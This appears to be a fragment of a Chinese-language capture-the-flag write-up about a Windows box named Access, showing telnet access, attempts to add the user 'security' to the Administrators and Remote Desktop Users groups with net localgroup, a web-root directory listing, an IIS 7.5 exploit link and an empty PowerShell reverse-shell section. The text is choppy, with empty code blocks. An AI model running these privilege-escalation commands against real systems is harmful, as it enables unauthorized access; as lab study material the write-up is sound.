Access(port:23-telnet登入反弹cmd)
Administrator
The command completed successfully.
net localgroup Administrators security /add 尝试将本用户加入管理员组,失败。
net localgroup “Remote Desktop Users”
net localgroup “Remote Desktop Users” security /add 尝试加入远程桌面用户组
1 | |
C:\inetpub>cd wwwroot
C:\inetpub\wwwroot>dir
Volume in dri
C has no label.
Volume Serial Number is 9C45-DBF0
Directory of C:\inetpub\wwwroot
08/24/2018 07:39 PM
08/24/2018 07:39 PM
08/21/2018 10:30 PM
08/23/2018 11:33 PM 391 index.html
08/24/2018 07:39 PM 88,712 out.jpg
2 File(s) 89,103 bytes
3 Dir(s) 16,623,439,872 bytes free
cd aspnet_client
1 | |
IIS 7.5源代码披露/身份验证绕过
https://blog.alertlogic.com/blog/internet-information-server-(iis)-exploitation/
尝试2,powershell反弹shell
1 | |
总结
下回学下windows,没有msf怎么手动提权。windows提权做的比较少。
